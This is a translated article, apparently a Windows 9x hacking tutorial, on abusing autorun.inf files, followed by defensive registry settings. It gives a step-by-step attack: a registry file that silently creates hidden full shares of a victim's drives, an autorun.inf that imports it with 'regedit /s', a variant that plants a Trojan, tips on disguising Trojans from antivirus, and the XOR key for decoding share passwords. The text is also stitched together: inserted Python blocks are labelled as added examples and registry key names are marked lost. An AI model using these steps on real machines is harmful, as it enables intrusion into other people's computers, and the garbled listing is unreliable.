Analysis of attacks from autorun.inf files

xiaoxiao 2021-03-18

Recently a trick has been circulating online that makes every hard disk of the other party fully shared, or plants a Trojan on it. Because the use of autorun.inf files in hacking is still rare and there is little material about it, many people find it mysterious. This article tries to lift that veil so that you fully understand this uncomplicated but extremely interesting technique.

First, theoretical foundation

Friends who often use CDs know that many discs start playing as soon as they are put into the optical drive. How do they do it? A disc runs automatically thanks to two files: autorun.inf on the disc itself, and CDVSD.vxd in the operating system's system directory. CDVSD.vxd constantly checks whether a disc is present in the drive. If one is, it looks for an autorun.inf file in the root directory of the CD, and if that file exists it executes the program preset inside it.

Autorun.inf is not limited to automatically running programs from CDs; a hard disk can be made to run automatically as well. The method is simple: first create a new text file in Notepad, then right-click the file, choose "Rename" from the pop-up menu and change the name to autorun.inf, and type the following into it:

    [Autorun]         ; marks the start of the autorun section; this line is mandatory
    icon=c:\c.ico     ; give drive C: the icon c.ico
    open=c:\1.exe     ; path and name of the program to run, here 1.exe in the root of C:

Save the file and press F5 to refresh the desktop, then look at the drive in "My Computer" (here C:). You will find that its drive icon has changed, and double-clicking to open C: will also automatically run the 1.exe file on C:!

Explanation: the "[Autorun]" line is a mandatory fixed header. The "icon" line specifies the icon file; "c:\c.ico" is the icon file's path and file name, which you can change to the path and file name of your own image when you type it. ".ico" is the extension for icon files. If you have no such file at hand, you can use picture software such as ACDSee to convert an image in another format to ICO format, or take a BMP file and simply rename it to an ICO file.

The "open" line specifies the file to run automatically, together with its drive letter and path. In particular, if you want to change the hard disk back so that it has no autorun file, you should delete the "open" line; otherwise the hard disk will not open because the autorun file cannot be found, and you will only be able to open it by right-clicking and choosing "Open" from the pop-up menu.

Please note that the saved file name must be "autorun.inf", and that the autorun.inf file and the icon file must be placed in the root directory of the hard disk. Furthermore, if the content of your hard disk is fixed for the time being, use Flash to make an autorun file and then edit the "autorun" file accordingly, and you will have the coolest, most personal hard drive.

I am not finished yet. Everyone knows that after some discs are inserted, right-clicking their icon shows a distinctive custom menu. If right-clicking our hard drive produced the same effect it would be even more special. In fact, a disc gets this effect from two statements in the autorun.inf file:

    shell\<name>=<text shown in the right-click menu>
    shell\<name>\command=<file or command line to execute>

So, to give the hard disk a distinctive custom menu, add the statements above to the autorun.inf file. Example:

    shell\1=Tian Ruo Skyland
    shell\1\command=notepad ok.txt

After saving, press F5 to refresh, then right-click the hard disk icon: you will find "Tian Ruo Skyland" in the pop-up menu (Figure 1), and clicking it automatically opens the "ok.txt" file on the hard disk. Note: the example above assumes that the "ok.txt" file is in the root directory of the hard disk and that Notepad comes with the system. If the file to be executed is itself executable, put the executable's file name directly after "command=".
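When auditing a drive root, the first question is what an autorun.inf found there would actually execute. The following added example (not code from the original article) parses the [Autorun] section syntax described above and lists every command together with the user action that triggers it; the sample file is constructed from the article's own entries.

```python
"""List what an autorun.inf would run: the open= target and every shell menu command."""
import re

# Constructed sample combining the icon/open and shell entries discussed above.
SAMPLE_AUTORUN_INF = """\
[Autorun]
icon=c:\\c.ico
open=c:\\1.exe
shell\\1=Tian Ruo Skyland
shell\\1\\command=notepad ok.txt
"""


def parse_autorun_inf(text):
    """Return the key/value pairs of the [Autorun] section with lower-cased keys.

    INF files are case-insensitive, ';' starts a comment, and any section
    other than [Autorun] is ignored.
    """
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            in_autorun = section.group(1).strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_actions(text):
    """Return (trigger, command) pairs for everything the file would execute.

    'open' fires when the drive is double-clicked; shell\\<name>\\command fires
    when the user picks that entry from the drive's right-click menu.
    """
    entries = parse_autorun_inf(text)
    actions = []
    if "open" in entries:
        actions.append(("double-click", entries["open"]))
    for key, value in entries.items():
        parts = key.split("\\")
        if len(parts) == 3 and parts[0] == "shell" and parts[2] == "command":
            label = entries.get("shell\\" + parts[1], parts[1])
            actions.append(("menu:" + label, value))
    return actions
```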

Figure 1

Second, example

Let's take an example. Suppose you have scanned and found a machine with a share on port 139, and the other side has shared only its D: drive, but we want all of its drives shared. First edit a registry file: open Notepad and type the following:

    REGEDIT4
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
    "Path"="C:\\"
    "<key name lost>"=""
    "<key name lost>"=dword:00000000
    "Flags"=dword:00000302
    "Parm1enc"=hex:
    "Parm2enc"=hex:
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\D$]
    "Path"="D:\\"
    "<key name lost>"=""
    "<key name lost>"=dword:00000000
    "Flags"=dword:00000302
    "Parm1enc"=hex:
    "Parm2enc"=hex:
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\E$]
    "Path"="E:\\"
    "<key name lost>"=""
    "<key name lost>"=dword:00000000
    "Flags"=dword:00000302
    "Parm1enc"=hex:
    "Parm2enc"=hex:

I have only set it up as far as the E: drive; if the other side has more logical drives, add them yourself. Save the above as a file named Share.REG for later use. Pay special attention that REGEDIT4 is uppercase and at the very top, that the line after it is left empty, and that you press Enter at the end of the last line.

Then open Notepad, prepare an autorun.inf file, and type the following:

    [Autorun]
    open=regedit /s Share.REG    ; the /s switch imports the file without displaying any message

Save the autorun.inf file. Copy both Share.REG and autorun.inf to the root of the other party's D: drive; as soon as the other party double-clicks D:, Share.reg is imported into the registry, and after the other computer restarts all of its drives are fully shared.

If you want to plant a Trojan on the other side instead, simply change "open=regedit /s Share.REG" in the autorun.inf file to "open=<Trojan server file name>", then copy autorun.inf and the configured Trojan server to the root of the other party's D: drive. There is no need to run the Trojan server on the other machine: as soon as the other party double-clicks D:, the Trojan runs! The benefit is obvious: it greatly increases the initiative of the Trojan. Many people are now very vigilant and will not easily run an unfamiliar file, and this method is hard to guard against. To be clear, the people who plant Trojans on you will not be so stupid as to hand over the Trojan as-is. Generally they rename the Trojan server file, or give it a name resembling a system file, then change the Trojan's icon so it looks like a txt file, a zip file or an image, and finally modify the Trojan's resources so that anti-virus software does not recognize it (see this journal for the specific methods). By the time the recipient believes it is genuine, the Trojan has quietly entered the system. Seen from the other side, it is not hard to understand that the means above, supplemented by the autorun.inf file, are seamless!

Third, prevention method

The share type is entirely determined by the Flags value, which decides what kind of shared directory it is. When Flags=0x302, after the system restarts the share marker on the directory disappears: on the surface there is no sharing, while in fact the directory is fully shared. The share worm popular online exploits exactly this feature. If you change "Flags"=dword:00000302 to "Flags"=dword:00000402, you can see that the hard disk is shared. Do you understand? This is the secret!

Parm1enc in the code above is the encrypted password. The system encrypts the password by XORing it with the 8 bytes "35 9A 4B A6 53 A9 D4 6A"; to recover a password, XOR again and look up the result in the ASCII table to obtain the directory password. Some network software uses this property to crack share passwords, so that from one machine on the local area network you can see the share password of another computer.

Nethacker II, which is designed around the TCP/IP protocol, can search the Internet for shared hosts and then perform the corresponding operations. So when you go online through a modem you must be careful, because one careless moment and your host is fully shared with the other side.

The solution is to delete the "C$", "D$", "E$" and similar keys under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan. Then delete VSERVER.VXD under Windows\System, which is the virtual device driver for file sharing on Microsoft networks, and finally delete the vserver key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD. Then you are safe.

In addition, turning off the hard disk's Autorun feature is also an effective way to prevent hacker intrusion. The specific method: enter regedit in the "Run" menu to open Registry Editor, expand to the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, and find "NoDriveTypeAutoRun" in the right pane. This value determines whether the autorun feature of the CD-ROM or hard disk is executed. Double-click "NoDriveTypeAutoRun"; in the default state (that is, when you have not changed the autorun settings) you will see that its default value is 95,00,00,00, as shown in Figure 2. The first byte, "95", is a hexadecimal value listing all the devices whose autorun is disabled. "95" in binary is 10010101; each bit represents one device, and Windows uses the following values for the different devices:

Figure 2

    Device name         Bit  Default  Mask  Meaning
    DRIVE_UNKNOWN       0    1        01h   Unrecognized device type
    DRIVE_NO_ROOT_DIR   1    0        02h   Drive without a root directory
    DRIVE_REMOVABLE     2    1        04h   Removable drive
    DRIVE_FIXED         3    0        08h   Fixed drive
    DRIVE_REMOTE        4    1        10h   Network drive
    DRIVE_CDROM         5    0        20h   CD-ROM
    DRIVE_RAMDISK       6    0        40h   RAM disk
    Reserved            7    1        80h   Drive type not yet specified

In the table above, a "Default" value of 0 means that device runs autorun and 1 means it does not. By default Windows disables 80h, 10h, 04h and 01h; adding these values gives hexadecimal 95h, which is why the default value of "NoDriveTypeAutoRun" is 95,00,00,00. From this analysis it is easy to see that by default the devices that run autorun are DRIVE_NO_ROOT_DIR, DRIVE_FIXED, DRIVE_CDROM and DRIVE_RAMDISK. So to stop hard disks from running autorun.inf files you must set the DRIVE_FIXED bit to 1, because DRIVE_FIXED represents a fixed drive, that is, a hard disk. The original 10010101 (the "Default" column of the table read from bottom to top) becomes binary 10011101, which is hexadecimal 9D. Now change the value of "NoDriveTypeAutoRun" to 9D,00,00,00, close Registry Editor, and after the computer restarts the hard disk's autorun feature is off.

If you have understood this, you surely know how to disable the CD Autorun feature, right? Set DRIVE_CDROM to 1, so the first byte of the "NoDriveTypeAutoRun" value becomes 10110101, which is hexadecimal B5. Change the first byte to B5, close Registry Editor, and after restarting the computer the CD-ROM's Autorun feature is off. If you only want to disable the autorun feature of software discs while keeping the automatic playback of audio CDs, just set the value of "NoDriveTypeAutoRun" to BD,00,00,00. To restore the autorun feature of the hard disk or the optical drive, perform the reverse operation.
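The bit arithmetic above (95h to 9Dh, B5h and BDh) is easy to get wrong by hand. This added example, not code from the original article, encodes the table as bit positions and computes or decodes a NoDriveTypeAutoRun value, so a defender can verify what a value found in the registry actually disables; the helper names are my own.

```python
"""Compute and decode NoDriveTypeAutoRun: a set bit disables autorun for that drive type."""

DRIVE_TYPES = {              # name: bit position (mask = 1 << bit), from the table above
    "DRIVE_UNKNOWN": 0,      # 01h
    "DRIVE_NO_ROOT_DIR": 1,  # 02h
    "DRIVE_REMOVABLE": 2,    # 04h
    "DRIVE_FIXED": 3,        # 08h
    "DRIVE_REMOTE": 4,       # 10h
    "DRIVE_CDROM": 5,        # 20h
    "DRIVE_RAMDISK": 6,      # 40h
    "RESERVED": 7,           # 80h
}

WINDOWS_DEFAULT = 0x95  # 1001 0101: unknown, removable, remote and reserved disabled


def disable(value, *names):
    """Return value with the bits of the named drive types set (autorun off)."""
    for name in names:
        value |= 1 << DRIVE_TYPES[name]
    return value


def enable(value, *names):
    """Return value with the bits of the named drive types cleared (autorun on)."""
    for name in names:
        value &= ~(1 << DRIVE_TYPES[name]) & 0xFF
    return value


def decode(value):
    """Return the sorted names of the drive types whose autorun is disabled."""
    return sorted(name for name, bit in DRIVE_TYPES.items() if (value >> bit) & 1)


def reg_binary(value):
    """Render the value as the 4-byte REG_BINARY shown by Regedit, e.g. '9d,00,00,00'."""
    return ",".join(f"{b:02x}" for b in value.to_bytes(4, "little"))


if __name__ == "__main__":
    hard_disk_off = disable(WINDOWS_DEFAULT, "DRIVE_FIXED")
    print(reg_binary(hard_disk_off), decode(hard_disk_off))
```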

In fact, Windows has no need to honour an autorun.inf file in the root directory of a hard disk, so we can simply disable the hard drive's autorun feature. Then, even if an autorun.inf file exists in the root directory of the hard disk, Windows will not run the program it specifies, which achieves the goal of preventing hackers from intruding by way of the autorun.inf file.

In addition, we should also make Windows display hidden shares. Everyone knows that when you set up a share in Windows 9x, you can hide it by appending the "$" symbol to the share name. For example, if we share a computer's C: drive under the name C$, the shared C: drive is not visible and can only be accessed by entering the exact path of the share. However, we only need to modify the msnp32.dll file on our computer to make Windows show hidden shares.

Because msnp32.dll is in use while Windows is running, this file cannot be modified directly, so we must copy msnp32.dll from the C:\Windows\System folder to C:\ and name the copy MSNP32. Run UltraEdit or another hex editor, open MSNP32, find "24 56 E8 17" (located at offset 00003190 to 000031A0), change the "24" to "00", save, and close UltraEdit. Restart the computer into DOS mode, enter copy c:\msnp32.dll c:\windows\system\msnp32.dll at the command prompt, restart into Windows, and now double-clicking the share shows the hidden shares.

Finally, a reminder: hacker software such as Nethacker II, designed around the TCP/IP protocol, can search the Internet for shared hosts and then perform the corresponding operations. So when you go online through a modem you must be careful, because one careless moment and your host is fully shared with the other side. The ways to prevent this are nothing more than regularly checking the system, applying patches to the system, regularly using anti-hacker and anti-virus software, enabling the firewall, watching for abnormal phenomena, paying attention to the contents of autorun.inf files, turning sharing off or not setting full sharing, and using complex share passwords.

Disclaimer: the purpose of this article is to give everyone a clear understanding of popular hacker methods and to raise your own awareness of protection, so please do not use this article for illegal things. Remember: if you would not want it done to you, do not do it!

Please cite the original address when reposting: https://www.9cbs.com/read-130015.html
